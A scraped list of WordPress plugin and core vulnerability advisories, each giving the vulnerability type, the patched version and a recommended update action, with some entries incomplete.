Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Server Side Request Forgery
Patched Version: 3.8.28
Recommended Action: Update to version 3.8.28, or a newer patched version

Plugin: Advanced AJAX Product Filters

Vulnerability: Arbitrary Settings Update
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: SEO Friendly Images

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: 1003 Mortgage Application

Vulnerability: Authenticated (Subscriber+) Arbitrary File Download
Patched Version: 1.80
Recommended Action: Update to version 1.80, or a newer patched version

Plugin: PhoneTrack Meu Site Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.1.1
Recommended Action: Update to version 0.1.1, or a newer patched version

Plugin: Under Construction

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.86
Recommended Action: Update to version 3.86, or a newer patched version

Plugin: Donation Block For PayPal

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: FG PrestaShop to WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.20.0
Recommended Action: Update to version 3.20.0, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.1.18
Recommended Action: Update to version 7.1.18, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Ad Buttons

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Lana Email Logger

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Modal Dialog

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.5.10
Recommended Action: Update to version 3.5.10, or a newer patched version

Plugin: TI WooCommerce Wishlist

Vulnerability: Arbitrary Options Update
Patched Version: 1.21.12
Recommended Action: Update to version 1.21.12, or a newer patched version

Plugin: stats

Vulnerability: SQL Injection
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Customer Reviews for WooCommerce

Vulnerability: Missing Authorization in Reviews Exporter
Patched Version: 5.36.1
Recommended Action: Update to version 5.36.1, or a newer patched version

Plugin: TableOn – WordPress Posts Table Filterable

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: BestWebSoft's Twitter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.15
Recommended Action: Update to version 2.15, or a newer patched version

Plugin: Sponsors Carousel

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting in show
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Fields

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Crypto Converter ⚡ Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: WatuPRO

Vulnerability: SQL Injection
Patched Version: 5.5.3.7
Recommended Action: Update to version 5.5.3.7, or a newer patched version

Plugin: Dynamic Pricing and Discount Rules for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: NextCellent Gallery – NextGEN Legacy

Plugin: Dropbox Folder Share

Vulnerability: Unauthenticated Server-Side Request Forgery via ‘link’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Daily Prayer Time

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2021.08.10
Recommended Action: Update to version 2021.08.10, or a newer patched version

Plugin: WP Athletics

Plugin: Slider by Soliloquy – Responsive Image Slider for WordPress

Vulnerability: Missing Authorization
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: ResAds

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Catalyst Connect Zoho CRM Client Portal

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Arbitrary Redirect
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Super Testimonials

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: RD Order Modifier for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection via tutor_quiz_builder_get_answers_by_question
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: WP Basic Elements

Vulnerability: Missing Authorization to Plugin Settings Update via wpbe_save_settings
Patched Version: 5.3.0
Recommended Action: Update to version 5.3.0, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: WooSwipe WooCommerce Gallery

Vulnerability: Missing Authorization
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Full Path Disclosure
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Netroics Blog Posts Grid

Plugin: Welcart e-Commerce

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Authenticated PHP Object Injection
Patched Version: 6.8.2
Recommended Action: Update to version 6.8.2, or a newer patched version

Plugin: Learning Courses

Vulnerability: Open Redirect
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: WP Job Portal – A Complete Recruitment System for Company or Job Board website

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: Affiliates Manager

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.9.0
Recommended Action: Update to version 2.9.0, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.1.6
Recommended Action: Update to version 6.1.6, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting via openai_settings_option_callback
Patched Version: 4.4.9
Recommended Action: Update to version 4.4.9, or a newer patched version

Plugin: Bookshelf

Plugin: Terms descriptions

Vulnerability: Reflected Cross-Site Scripting via term_search
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: WP Payeezy Pay

Vulnerability: Local File Inclusion
Patched Version: 2.98
Recommended Action: Update to version 2.98, or a newer patched version

Core: WordPress

Vulnerability: Server Side Request Forgery #2
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.14, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: Post Meta Data Manager

Vulnerability: Missing Authorization to User, Term, and Post Meta Deletion
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Translate WordPress with GTranslate

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.65
Recommended Action: Update to version 2.8.65, or a newer patched version

Plugin: Duplicate Post Page Menu & Custom Post Type

Vulnerability: Missing Authorization to Post Duplication
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: VRView

Plugin: WooCommerce Beta Tester

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Xhanch – My Twitter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.7
Recommended Action: Update to version 2.7.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Freshdesk (official)

Vulnerability: Open Redirect
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: WP-Property – WordPress Powered Real Estate and Property Management

Vulnerability: Remote File Upload
Patched Version: 1.35.1
Recommended Action: Update to version 1.35.1, or a newer patched version

Plugin: SmokeSignal

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting via post_meta
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: SpamReferrerBlock

Plugin: Mail Masta

Vulnerability: SQL Injection via member_id parameter
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accept Donations with PayPal & Stripe

Vulnerability: No subtitle
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: WeSecur Security – Antivirus, Malware Scanner and Protection for your WordPress

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.2.0
Recommended Action: Update to version 5.2.0, or a newer patched version

Plugin: RokStories

Vulnerability: Arbitrary File Upload
Patched Version: 1.26
Recommended Action: Update to version 1.26, or a newer patched version

Plugin: Thank Me Later

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Missing Authorization
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: Responsive Column Widgets

Vulnerability: Reflected Cross-Site Scripting via tab
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.0
Recommended Action: Update to version 3.3.0, or a newer patched version

Plugin: Export Import Menus

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Order Delivery Date for WP e-Commerce

Plugin: Zero Spam for WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.4.5
Recommended Action: Update to version 5.4.5, or a newer patched version

Plugin: FoxyPress

Vulnerability: Arbitrary File Upload
Patched Version: 0.4.2.6
Recommended Action: Update to version 0.4.2.6, or a newer patched version

Plugin: Phoenix Media Rename

Vulnerability: Author Arbitrary Media File Renaming
Patched Version: 3.4.4
Recommended Action: Update to version 3.4.4, or a newer patched version

Plugin: Current Menu Item for Custom Post Types

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Dyslexiefont Free

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Cross-Site Scripting
Patched Version: 4.16.18
Recommended Action: Update to version 4.16.18, or a newer patched version

Plugin: Private Files

Vulnerability: Cross-Site Request Forgery to Disable Protection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Content Slide

Plugin: Gallery from files

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WooCommerce Product Add-ons

Vulnerability: Authenticated (Shop Manager+) PHP Object Injection
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: No External Links

Vulnerability: Cross-Site Scripting
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News & YouTube Video Feeds Aggregator

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Audio Merchant

Vulnerability: Cross-Site Request Forgery to Settings Modifcation and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Forums

Vulnerability: Directory Traversal
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Better Search – Relevant search results for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: WP-Backgrounds Lite

Plugin: Member Approval

Plugin: Kingkong Board

Plugin: WP Page Builder

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Evergreen Content Poster – Auto Post and Schedule Your Best Content to Social Media

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Hermit 音乐播放器

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6.8
Recommended Action: Update to version 4.1.6.8, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Missing Authorization to Form Submission Export
Patched Version: 3.6.26
Recommended Action: Update to version 3.6.26, or a newer patched version

Plugin: WP Slider Plugin

Plugin: Rough Chart

Plugin: Edit Comments

Plugin: EWWW Image Optimizer

Vulnerability: Sensitive Information Exposure
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Missing Authorization
Patched Version: 2.8.8
Recommended Action: Update to version 2.8.8, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Privilege Escalation
Patched Version: 4.9.28
Recommended Action: Update to version 4.9.28, or a newer patched version

Plugin: Toolset Types – Custom Post Types, Custom Fields and Taxonomies

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.1.2
Recommended Action: Update to version 1.2.1.2, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization Checks
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: JetEngine

Vulnerability: Authenticated(Author+) Arbitrary File Upload to Remote Code Execution
Patched Version: 3.1.3.1
Recommended Action: Update to version 3.1.3.1, or a newer patched version

Plugin: Simple Link Directory

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.3.5
Recommended Action: Update to version 7.3.5, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 3.0.18
Recommended Action: Update to version 3.0.18, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: SQL Injection
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: 6.6.4
Patched Version: 6.6.5
Recommended Action: Update to version 6.6.5, or a newer patched version

Plugin: Post Meta Data Manager

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Privilege Escalation
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Fluid Responsive Slideshow

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.7
Recommended Action: Update to version 2.2.7, or a newer patched version

Plugin: WP Job Manager

Vulnerability: Arbitrary File Upload
Patched Version: 1.26.2
Recommended Action: Update to version 1.26.2, or a newer patched version

Plugin: Online Exam Software : eExamhall

Plugin: Print Invoice & Delivery Notes for WooCommerce

Vulnerability: Cross-Site Request Forgery via ts_reset_tracking_setting
Patched Version: 4.7.3
Recommended Action: Update to version 4.7.3, or a newer patched version

Plugin: Theme Editor

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: Mediamatic – Media Library Folders

Plugin: Product Catalog Feed by PixelYourSite

Vulnerability: Reflected Cross-Site Scripting via ‘edit’
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Missing Capabilities Check to Information Disclosure
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Salon Booking System

Vulnerability: Sensitive Information Disclosure
Patched Version: 7.6.3
Recommended Action: Update to version 7.6.3, or a newer patched version

Plugin: Permalink Manager Lite

Vulnerability: Missing Authorization
Patched Version: 2.2.20.1
Recommended Action: Update to version 2.2.20.1, or a newer patched version

Plugin: Affiliate Program Suite — SliceWP Affiliates

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.46
Recommended Action: Update to version 1.0.46, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Missing Authorization
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: barclaycart

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Ultimate Addons for Contact Form 7

Vulnerability: Reflected Cross-Site Scripting via ‘page’
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: WP Cloudy, weather plugin

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: buddybadges

Plugin: New Adman

Plugin: Pods – Custom Content Types and Fields

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.11
Recommended Action: Update to version 2.9.11, or a newer patched version

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .49
Recommended Action: Update to version .49, or a newer patched version

Plugin: Lightbox Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: PDF Viewer Block for Gutenberg

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Easy Digital Downloads – Product Reviews

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.10
Recommended Action: Update to version 1.3.10, or a newer patched version

Plugin: Continuous announcement scroller

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BackupBuddy

Vulnerability: Authentication Bypass
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated Sensitive Information Exposure via qcld_wb_chatbot_check_user
Patched Version: 4.9.1
Recommended Action: Update to version 4.9.1, or a newer patched version

Plugin: Auto Affiliate Links

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.2.8
Recommended Action: Update to version 6.4.2.8, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Ecwid by Lightspeed Ecommerce Shopping Cart

Vulnerability: Insufficient Access Control on Multiple AJAX Actions
Patched Version: 6.10.23
Recommended Action: Update to version 6.10.23, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: SQL Injection
Patched Version: 1.9.8.1
Recommended Action: Update to version 1.9.8.1, or a newer patched version

Plugin: CURCY – Multi Currency for WooCommerce – The best free currency exchange plugin – Run smoothly on WooCommerce 8.x

Vulnerability: Missing Authorization
Patched Version: 2.1.18
Recommended Action: Update to version 2.1.18, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.10
Recommended Action: Update to version 2.3.10, or a newer patched version

Plugin: Double Opt-In for Download

Vulnerability: SQL Injection
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Rezgo Online Booking

Vulnerability: Reflected Cross-Site-Scripting
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: SQL Injection
Patched Version: 5.0.1.6
Recommended Action: Update to version 5.0.1.6, or a newer patched version

Plugin: Trade Runner

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: SimpleModal Contact Form (SMCF)

Plugin: .htaccess Redirect

Plugin: Adaptive Images for WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 0.6.67
Recommended Action: Update to version 0.6.67, or a newer patched version

Plugin: WooCommerce – Product Importer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: SQL Injection
Patched Version: 2.6.6.0
Recommended Action: Update to version 2.6.6.0, or a newer patched version

Plugin: LaTeX for WordPress

Plugin: FCChat Widget

Vulnerability: Arbitrary File Upload
Patched Version: 2.2.13.7
Recommended Action: Update to version 2.2.13.7, or a newer patched version

Plugin: Clock In Portal- Staff & Attendance Management

Vulnerability: Cross-Site Request Forgery to Staff Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Google Doc Embedder

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Materialis Companion

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3.40
Recommended Action: Update to version 1.3.40, or a newer patched version

Plugin: Images Optimize and Upload CF7

Vulnerability: Missing Authorization to Arbitrary File Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Multiple Page Generator Plugin – MPG

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 3.3.18
Recommended Action: Update to version 3.3.18, or a newer patched version

Plugin: PrettyLinks – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin

Vulnerability: SQL Injection
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: WPBulky – WordPress Bulk Edit Post Types

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Inactive Logout

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WebLibrarian

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.8.6
Recommended Action: Update to version 3.4.8.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Core: WordPress

Vulnerability: Deserialization
Patched Version: 3.6.1
Recommended Action: Update to version 3.6.1, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated SQL Injection
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Core: WordPress

Vulnerability: Forced Password Reset
Patched Version: 2.8.4
Recommended Action: Update to version 2.8.4, or a newer patched version

Plugin: TPG Redirect

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: WP Discord Invite

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Contextual Related Posts

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: Prismatic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Duplicate Theme

Vulnerability: Cross-Site Request Forgery via themeDuplicationAction
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin)

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: 7.12.1
Recommended Action: Update to version 7.12.1, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Order Information Disclosure
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: WCFM – Frontend Manager for WooCommerce along with Bookings Subscription Listings Compatible

Vulnerability: Missing Authorization
Patched Version: 6.6.1
Recommended Action: Update to version 6.6.1, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Cross-Site Scripting
Patched Version: 6.2.2
Recommended Action: Update to version 6.2.2, or a newer patched version

Plugin: HUSKY – Products Filter Professional for WooCommerce

Vulnerability: Products Filter for WooCommerce <= 1.2.6.2
Patched Version: 1.2.6.3
Recommended Action: Update to version 1.2.6.3, or a newer patched version

Plugin: WPS Hide Login

Vulnerability: Login Page Disclosure via Referer Header
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Site Reviews

Vulnerability: Missing Authorization
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: Quick Contact Form

Vulnerability: Cross-Site Scripting
Patched Version: 6.1
Recommended Action: Update to version 6.1, or a newer patched version

Plugin: Postie

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.41
Recommended Action: Update to version 1.9.41, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘ajax_deactivate’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Tabs Responsive – With WooCommerce Product Tabs Extension

Vulnerability: Editor+ Stored Cross-Site Scripting
Patched Version: 2.2.8
Recommended Action: Update to version 2.2.8, or a newer patched version

Plugin: Visualizer: Tables and Charts Manager for WordPress

Vulnerability: Authenticated (Contributor+) PHAR Deserialization
Patched Version: 3.7.10
Recommended Action: Update to version 3.7.10, or a newer patched version

Plugin: Companion Auto Update

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 3.3.6
Recommended Action: Update to version 3.3.6, or a newer patched version

Plugin: CM Ad Changer – Ad Manager and Ad Server

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.7.8
Recommended Action: Update to version 1.7.8, or a newer patched version

Plugin: WP Post Columns

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics

Plugin: Theme Blvd Responsive Google Maps

Plugin: My YouTube Channel

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.23.0
Recommended Action: Update to version 3.23.0, or a newer patched version

Plugin: WP Performance Score Booster – Optimize Speed, Enable Cache & Page Preload

Vulnerability: Settings Change via Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Cross-Site Request Forgery leading to Stored Cross-Site Scripting
Patched Version: 3.4.24.2
Recommended Action: Update to version 3.4.24.2, or a newer patched version

Plugin: my-category-order

Vulnerability: SQL Injection
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: DukaPress

Vulnerability: Blind SQL Injection
Patched Version: 2.5.9.1
Recommended Action: Update to version 2.5.9.1, or a newer patched version

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
